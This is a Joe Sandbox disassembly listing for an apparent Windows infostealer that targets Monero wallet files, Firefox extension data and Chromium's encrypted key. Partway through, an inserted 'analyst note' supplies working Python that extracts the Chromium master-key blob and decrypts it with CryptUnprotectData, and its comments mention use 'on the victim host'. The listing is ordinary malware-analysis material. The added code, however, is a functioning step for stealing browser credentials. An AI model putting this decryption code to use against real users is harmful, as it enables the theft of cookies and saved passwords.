                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00096726
                                    • ExitProcess.KERNEL32 ref: 00096755
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 69897c8bd0e75c587de9ae86e314d6ef9e31c6e2fc478cd6361f3a865c417bdd
                                    • Instruction ID: 5068a3c48af066a837e5bfa3ecb44a157c04fabf981fcddf2c17d6b2737fec70
                                    • Opcode Fuzzy Hash: 69897c8bd0e75c587de9ae86e314d6ef9e31c6e2fc478cd6361f3a865c417bdd
                                    • Instruction Fuzzy Hash: BB314FB1D01218ABDB14EB90DC96FDEB778AF04300F404189F30A66192DF746B49DFAA
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000A0E28,00000000,?), ref: 0009882F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00098836
                                    • wsprintfA.USER32 ref: 00098850
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 51fc1c880ead9c8b72d052df01df006b059c443a8d0685ca38d1e37b32abf42b
                                    • Instruction ID: 879a9f0c313e59f4581bea3ae116c8b1263dd94774be4561b54cd162b332f8b6
                                    • Opcode Fuzzy Hash: 51fc1c880ead9c8b72d052df01df006b059c443a8d0685ca38d1e37b32abf42b
                                    • Instruction Fuzzy Hash: 6F210DB1E44208AFDB04DFD4ED49FAEBBB8FB49715F104219F605A7290C779A901CBA1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0009951E,00000000), ref: 00098D5B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00098D62
                                    • wsprintfW.USER32 ref: 00098D78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: d5357653e6c0044a628c738429191ab1f5131ae15703216ae668bc014dd009e2
                                    • Instruction ID: 19472a941a6435e7f3fb3319c938c7fb8a8618dd243d754d66cad4a99d0d7e6c
                                    • Opcode Fuzzy Hash: d5357653e6c0044a628c738429191ab1f5131ae15703216ae668bc014dd009e2
                                    • Instruction Fuzzy Hash: FAE08CB0A4020CBBD700DBD4EC0EE6DB7B8EB0470AF000195FE0987280DA719E008B96
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D3EEF0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008A2E1
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 0008A3FF
                                    • lstrlen.KERNEL32(00000000), ref: 0008A6BC
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                    • DeleteFileA.KERNEL32(00000000), ref: 0008A743
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: a254debb05e908b7fd19d9a590751c41f68b651aa77a52c8cb1d3d3f26ea5866
                                    • Instruction ID: 0951a69f88985f8cc737806bacd5365ea56854e4ac75fe9c43b6514d6420fe25
                                    • Opcode Fuzzy Hash: a254debb05e908b7fd19d9a590751c41f68b651aa77a52c8cb1d3d3f26ea5866
                                    • Instruction Fuzzy Hash: 74E1CC72A201189BDF05FBA4EC96EEE7338BF15300F508159F51676092EF306A4DDBA6
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D3EEF0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008D481
                                    • lstrlen.KERNEL32(00000000), ref: 0008D698
                                    • lstrlen.KERNEL32(00000000), ref: 0008D6AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 0008D72B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: d29c07259d55355d42f0dae2e47215566039dcde89dd2e05873ace5e9027a032
                                    • Instruction ID: ee45d612faf7cadd3d3a8838ef3ec733ddccce63551cc7cb03936c3a6fd22d2e
                                    • Opcode Fuzzy Hash: d29c07259d55355d42f0dae2e47215566039dcde89dd2e05873ace5e9027a032
                                    • Instruction Fuzzy Hash: 4391FE72A101189BDF04FBA4ED96EEE7338BF15304F504169F517A6092EF346A09DBA2
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D3EEF0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008D801
                                    • lstrlen.KERNEL32(00000000), ref: 0008D99F
                                    • lstrlen.KERNEL32(00000000), ref: 0008D9B3
                                    • DeleteFileA.KERNEL32(00000000), ref: 0008DA32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 023b283c35af119896501a62402d2f16bd8e9baf5325127574e4770984287ccd
                                    • Instruction ID: f7339bb11165456b1b673d0d827a205b40c1856f36a8095c4cc1f9cd384d5e44
                                    • Opcode Fuzzy Hash: 023b283c35af119896501a62402d2f16bd8e9baf5325127574e4770984287ccd
                                    • Instruction Fuzzy Hash: CE81E072A201189BDF04FBA4DD96EEE7338BF15304F504519F507A6092EF346A09DBE2
                                    APIs
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                      • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                      • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                      • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                      • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                      • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                      • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,000A1580,000A0D92), ref: 0008F54C
                                    • lstrlen.KERNEL32(00000000), ref: 0008F56B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: e6be56e24154a9dc7a4dd05c49663974d62670ee41f964f1cc4b9e5c165c9959
                                    • Instruction ID: f9e54f50083f9293a16a88ea813a76598e8568c27f091899f383787a14d22eb1
                                    • Opcode Fuzzy Hash: e6be56e24154a9dc7a4dd05c49663974d62670ee41f964f1cc4b9e5c165c9959
                                    • Instruction Fuzzy Hash: A151CE71E10108AADF04FBB4DC96DEE7379AF55300F408529F916A6192EE346A09DBE2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: ccfb3392df268e032dae63e721f574b63c991c64d11a5b2c5d3e9196808daefe
                                    • Instruction ID: 7d77f3e1c0e6f2b66ced667d64029c87d2e8edf9333ed4fadaff13ff5e6776d8
                                    • Opcode Fuzzy Hash: ccfb3392df268e032dae63e721f574b63c991c64d11a5b2c5d3e9196808daefe
                                    • Instruction Fuzzy Hash: CE413E71E14109AFCF04EFE4D846AFEB7B4BF49304F008418E51676291EB75AA05DFA2
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                      • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                      • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                      • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                      • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                      • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                      • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00089D39
                                      • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089AEF
                                      • Part of subcall function 00089AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00084EEE,00000000,?), ref: 00089B01
                                      • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089B2A
                                      • Part of subcall function 00089AC0: LocalFree.KERNEL32(?,?,?,?,00084EEE,00000000,?), ref: 00089B3F
                                      • Part of subcall function 00089B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00089B84
                                      • Part of subcall function 00089B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00089BA3
                                      • Part of subcall function 00089B60: LocalFree.KERNEL32(?), ref: 00089BD3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 09c8b61ba3f5c381da1508ef302fd6937e65dc54e5a6591febd42f36fc5810c2
                                    • Instruction ID: eeba982022536b019ee9232b13e732daf4309223df97b0037d73c41519a1cc1b
                                    • Opcode Fuzzy Hash: 09c8b61ba3f5c381da1508ef302fd6937e65dc54e5a6591febd42f36fc5810c2
                                    • Instruction Fuzzy Hash: 26313EB5D10209ABCF04FBE4DC85AFEB7B8BF48304F184519E945A7242EB349A14CBA5
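Analyst note on the function summarised above. Its API ID expands to LocalAlloc/LocalFree, CreateFile/GetFileSize/ReadFile/CloseHandle, CryptStringToBinary and CryptUnprotectData, and its String ID carries `"encrypted_key":"` and `DPAPI`. That is the Chromium "Local State" master-key routine: Chromium stores the browser's AES-GCM key as `os_crypt.encrypted_key`, which is base64 of the literal prefix `DPAPI` followed by a CryptProtectData blob bound to the logged-on user. The stealer reads the file, locates the JSON value, base64-decodes it, drops the five-byte prefix and hands the remainder to CryptUnprotectData. The Python below is an added triage helper written for this report, not code recovered from the sample or part of Joe Sandbox: it parses a Local State document, verifies the `DPAPI` prefix and the CryptProtectData blob header (version 1 plus the DPAPI provider GUID) so an analyst can confirm which artefact the sample was after, and only on Windows performs the same CryptUnprotectData call the malware makes. The sample Local State document it builds is constructed test data, not a real browser key.

```python
"""Triage helper: recover and validate the DPAPI blob that protects a Chromium
browser's master key from a 'Local State' file (added example, not from the sample)."""
import base64
import json
import sys
import uuid

# Chromium prepends this literal to the CryptProtectData output before base64
# encoding it into os_crypt.encrypted_key (Chromium os_crypt_win.cc, kDPAPIKeyPrefix).
DPAPI_PREFIX = b"DPAPI"
# Every CryptProtectData blob starts with a little-endian version 1 and the
# DPAPI provider GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb in mixed-endian (GUID) layout.
DPAPI_BLOB_VERSION = (1).to_bytes(4, "little")
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb").bytes_le


def is_dpapi_blob(blob):
    """True if the bytes carry the CryptProtectData header (version + provider GUID)."""
    return blob[:4] == DPAPI_BLOB_VERSION and blob[4:20] == DPAPI_PROVIDER_GUID


def extract_encrypted_key_blob(local_state_text):
    """Return the raw DPAPI blob stored in os_crypt.encrypted_key.

    Raises ValueError when the key is absent, the base64 is malformed, the
    'DPAPI' prefix is missing, or the payload is not a CryptProtectData blob.
    """
    state = json.loads(local_state_text)
    try:
        encoded = state["os_crypt"]["encrypted_key"]
    except (KeyError, TypeError):
        raise ValueError("no os_crypt.encrypted_key in Local State")
    raw = base64.b64decode(encoded, validate=True)
    if not raw.startswith(DPAPI_PREFIX):
        raise ValueError("encrypted_key lacks the 'DPAPI' prefix Chromium writes")
    blob = raw[len(DPAPI_PREFIX):]
    if not is_dpapi_blob(blob):
        raise ValueError("payload after 'DPAPI' is not a CryptProtectData blob")
    return blob


def looks_like_chromium_key(local_state_text):
    """Boolean wrapper for bulk triage of many Local State files."""
    try:
        extract_encrypted_key_blob(local_state_text)
        return True
    except ValueError:
        return False


def build_sample_local_state(key_material):
    """Construct a Local State document in Chromium's layout as a TEST FIXTURE.
    key_material stands in for CryptProtectData's ciphertext; it is not a real key."""
    fake_blob = DPAPI_BLOB_VERSION + DPAPI_PROVIDER_GUID + key_material
    encoded = base64.b64encode(DPAPI_PREFIX + fake_blob).decode("ascii")
    return json.dumps({"os_crypt": {"encrypted_key": encoded}})


def dpapi_unprotect(blob):
    """Decrypt a DPAPI blob under the current user's master key (Windows only).
    This is the CryptUnprotectData call the report attributes to the sample."""
    if sys.platform != "win32":
        raise OSError("CryptUnprotectData is only available on Windows")
    import ctypes
    from ctypes import wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [("cbData", wintypes.DWORD),
                    ("pbData", ctypes.POINTER(ctypes.c_char))]

    buf = ctypes.create_string_buffer(blob, len(blob))
    blob_in = DATA_BLOB(len(blob), ctypes.cast(buf, ctypes.POINTER(ctypes.c_char)))
    blob_out = DATA_BLOB()
    crypt32 = ctypes.windll.crypt32
    ok = crypt32.CryptUnprotectData(ctypes.byref(blob_in), None, None, None,
                                    None, 0, ctypes.byref(blob_out))
    if not ok:
        raise ctypes.WinError()
    try:
        return ctypes.string_at(blob_out.pbData, blob_out.cbData)
    finally:
        ctypes.windll.kernel32.LocalFree(blob_out.pbData)


if __name__ == "__main__":
    # Offline demonstration on constructed data; real use would read
    # %LOCALAPPDATA%\Google\Chrome\User Data\Local State on the victim host.
    doc = build_sample_local_state(b"\x11" * 32)
    blob = extract_encrypted_key_blob(doc)
    print("DPAPI blob of %d bytes, header valid: %s" % (len(blob), is_dpapi_blob(blob)))
```

On a live Windows host the decrypted output is the 32-byte AES-256-GCM key that protects cookie and login values, which is why the routine matters to the stealer; running `dpapi_unprotect` only succeeds in the context of the user whose browser profile it is, the same constraint the malware operates under.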
                                    APIs
                                    • memset.MSVCRT ref: 000994EB
                                      • Part of subcall function 00098D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0009951E,00000000), ref: 00098D5B
                                      • Part of subcall function 00098D50: RtlAllocateHeap.NTDLL(00000000), ref: 00098D62
                                      • Part of subcall function 00098D50: wsprintfW.USER32 ref: 00098D78
                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 000995AB
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 000995C9
                                    • CloseHandle.KERNEL32(00000000), ref: 000995D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                    • String ID:
                                    • API String ID: 3729781310-0
                                    • Opcode ID: 11d28576251538f30d4878e01e08e2e6c5d11138cb1e309907aa178fb930966c
                                    • Instruction ID: 4300c8c0662318b17426ac82fc97292dd88c8097b78ed478660149f987491e9a
                                    • Opcode Fuzzy Hash: 11d28576251538f30d4878e01e08e2e6c5d11138cb1e309907aa178fb930966c
                                    • Instruction Fuzzy Hash: B5313C71E0020CAFDF14DBD4DD49FEEB7B8FB44304F104559E506AA184DB74AA89DB52
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000A05B7), ref: 000986CA
                                    • Process32First.KERNEL32(?,00000128), ref: 000986DE
                                    • Process32Next.KERNEL32(?,00000128), ref: 000986F3
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • CloseHandle.KERNEL32(?), ref: 00098761
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: bc06f9be847d55c790ce4df1b634888fa0f3346d814bf9dbb93693304aabfccd
                                    • Instruction ID: 28a770abcd17d0799646d805156b67f20958869bb8dab24ed61be8cbd8d3e747
                                    • Opcode Fuzzy Hash: bc06f9be847d55c790ce4df1b634888fa0f3346d814bf9dbb93693304aabfccd
                                    • Instruction Fuzzy Hash: B7314D71A11218ABCF24DF95DC45FEEB778FB46700F104199F10AA61A1DF306A45DFA1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000A0E00,00000000,?), ref: 000979B0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000979B7
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,000A0E00,00000000,?), ref: 000979C4
                                    • wsprintfA.USER32 ref: 000979F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 3db8a3349c6aa84a1d59d11132d9ca7b9edc0e2c82c62a49132cf3dd0ad54647
                                    • Instruction ID: 8e2cbf19dd493d2b1d3ba30ac518c0e96a9be8877080c3187ba6e4876b897745
                                    • Opcode Fuzzy Hash: 3db8a3349c6aa84a1d59d11132d9ca7b9edc0e2c82c62a49132cf3dd0ad54647
                                    • Instruction Fuzzy Hash: 5C1115B2904118ABCB149FC9ED49FBEB7F8EB48B15F10421AF605A2280E2395940DBB1
                                    APIs
                                    • __getptd.LIBCMT ref: 0009C74E
                                      • Part of subcall function 0009BF9F: __amsg_exit.LIBCMT ref: 0009BFAF
                                    • __getptd.LIBCMT ref: 0009C765
                                    • __amsg_exit.LIBCMT ref: 0009C773
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0009C797
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: eb81484084110f7b2f6be819198dc62ad258f09fa79ae0786887f068fd011611
                                    • Instruction ID: 20987f5c33e9b1e45bdf8ca57ce5139b357ad4d64892f984acd7f8c05e315e59
                                    • Opcode Fuzzy Hash: eb81484084110f7b2f6be819198dc62ad258f09fa79ae0786887f068fd011611
                                    • Instruction Fuzzy Hash: 35F09032E08A009BFF60BBF86946B9D73E06F01720F204159F404A61D3DB645940BE96
                                    APIs
                                      • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00094F7A
                                    • lstrcat.KERNEL32(?,000A1070), ref: 00094F97
                                    • lstrcat.KERNEL32(?,00D389E8), ref: 00094FAB
                                    • lstrcat.KERNEL32(?,000A1074), ref: 00094FBD
                                      • Part of subcall function 00094910: wsprintfA.USER32 ref: 0009492C
                                      • Part of subcall function 00094910: FindFirstFileA.KERNEL32(?,?), ref: 00094943
                                      • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FDC), ref: 00094971
                                      • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FE0), ref: 00094987
                                      • Part of subcall function 00094910: FindNextFileA.KERNEL32(000000FF,?), ref: 00094B7D
                                      • Part of subcall function 00094910: FindClose.KERNEL32(000000FF), ref: 00094B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: f2f787d6057ca9b9c4330dd4638f931d757373cccbfa7bbdc7147fb29a515c43
                                    • Instruction ID: fd3f79142ff3f8f7f962b8dce798fb5b6a4abaf9f7d6354cbb23d188d7af0a41
                                    • Opcode Fuzzy Hash: f2f787d6057ca9b9c4330dd4638f931d757373cccbfa7bbdc7147fb29a515c43
                                    • Instruction Fuzzy Hash: F821AD7690020CA7CB54F7B0FC4AEED333CAB55304F404558B65997182EE7596C9CB93